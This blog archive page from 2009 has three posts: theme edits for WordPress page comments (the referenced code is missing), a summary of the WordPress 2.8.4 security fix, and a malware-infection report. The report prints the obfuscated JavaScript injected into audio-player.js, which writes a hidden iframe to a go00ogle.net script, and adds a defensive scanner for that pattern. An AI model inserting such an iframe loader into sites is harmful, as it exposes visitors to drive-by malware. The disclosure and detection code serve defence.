Archive for August, 2009

Page Comments for K2 and Unwakeable

For some time now, comments have been disabled on pages in K2 and Unwakeable. The modifications needed to allow comments on pages are extremely easy to make. If you use either of these themes and wish to enable comments on pages, please continue reading.

1. Open the page.php file located in your K2 or Unwakeable theme directory. Go to line 36, which should look like this:

2. Comment out that if statement, so it should look like this when you’re done:

3. You’re halfway done at this point. Now go to line 40, which should look like this:

4. Comment out this piece of code as well, so that line 40 looks like the code below.

5. Save the page.php file and you should be all set.

I will make this modification in the next release of Unwakeable so you won’t have to modify it yourself. You can expect to see a new version of Unwakeable released within a week.


WordPress 2.8.4 Security Release

WordPress 2.8.4 has been released. It’s a security release, which means you should upgrade immediately. This version fixes a problem that could allow remote users to reset the administrative password. Below is a summary from the WordPress development blog:

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

The SANS Internet Storm Center had a nice post about this earlier today that details why WordPress 2.8.4 was necessary.


Longren.org Marked as Suspicious by Google

So, as many visitors have probably noticed, longren.org has been listed as a suspicious site by Google. Visiting this site in Firefox will result in Firefox warning you that you could be visiting a website that could harm your computer.

Turns out this blog was infected with a go00ogle.net malware script. After following this helpful blog post, I was able to pinpoint the Audio Player plugin for WordPress as the culprit. The infected file was audio-player.js, and contained this snippet of code that should not have been there:

function advQuery(){
	var adv="http://google.com/";abs=unescape("%69%66%72%61%6D%65");Track="?sid=1";get=unescape("%6E%65%74");
	document.write("<"+abs+" src="+adv.substr(0,9)+unescape("\u0030\u0030")+adv.substr(9,5));
	document.write(get+"/go.php"+Track+" style=display:none><"+"/"+abs+">");
};advQuery();

I decided to just deactivate that plugin instead of deleting that piece of code from audio-player.js. This way there’s no chance audio-player.js will become infected again.
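
For checking other plugin and theme scripts for the same kind of injection, here is an added example (not code from the original post or from the plugin) that statically decodes `unescape()` literals and flags a file when an encoded tag name is combined with `document.write`. The function names `decodeLiteral` and `scanSource` are hypothetical, and both samples are constructed, with `example.invalid` as a placeholder host.

```javascript
// Added example (not from the original post): static triage of theme/plugin
// JavaScript for the injection pattern above. The scanned text is never run.

// Decode %XX and \uXXXX escapes found in a string literal's body.
function decodeLiteral(body) {
  const fromHex = (_, h) => String.fromCharCode(parseInt(h, 16));
  return body.replace(/\\u([0-9a-fA-F]{4})/g, fromHex)
             .replace(/%([0-9a-fA-F]{2})/g, fromHex);
}

// Inspect one file's source text and report why it looks injected, if it does.
function scanSource(source) {
  const decoded = [];
  const literal = /unescape\(\s*(["'])(.*?)\1\s*\)/g;
  for (const m of source.matchAll(literal)) {
    const text = decodeLiteral(m[2]);
    if (text !== m[2]) decoded.push(text);   // keep only literals that were encoded
  }
  const reasons = [];
  const tags = decoded.filter((t) => /^(iframe|script|object|embed)$/i.test(t));
  if (tags.length) reasons.push("encoded tag name: " + tags.join(", "));
  if (/document\.write\s*\(/.test(source)) reasons.push("document.write call");
  if (/display\s*:\s*none/i.test(source)) reasons.push("hidden element style");
  // An encoded tag name written into the page is the combination worth alerting on;
  // document.write or display:none alone are common in legitimate code.
  const suspicious = tags.length > 0 && reasons.includes("document.write call");
  return { suspicious, decoded, reasons };
}

// Constructed samples: same structure as the injected function, placeholder host.
const INFECTED_SAMPLE = String.raw`function player(){ return 1; }
function advQuery(){
  var abs=unescape("%69%66%72%61%6D%65"), z=unescape("\u0030\u0030");
  document.write("<"+abs+" src=http://example.invalid/go.php style=display:none></"+abs+">");
};advQuery();`;
const CLEAN_SAMPLE = 'function title(){ return unescape("Audio%20Player"); }';

for (const [name, src] of [["infected", INFECTED_SAMPLE], ["clean", CLEAN_SAMPLE]]) {
  const r = scanSource(src);
  console.log(name, r.suspicious ? "SUSPICIOUS" : "ok", JSON.stringify(r.reasons));
}
```

A hit is a reason to diff the file against a clean copy of the plugin, not proof of infection by itself.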

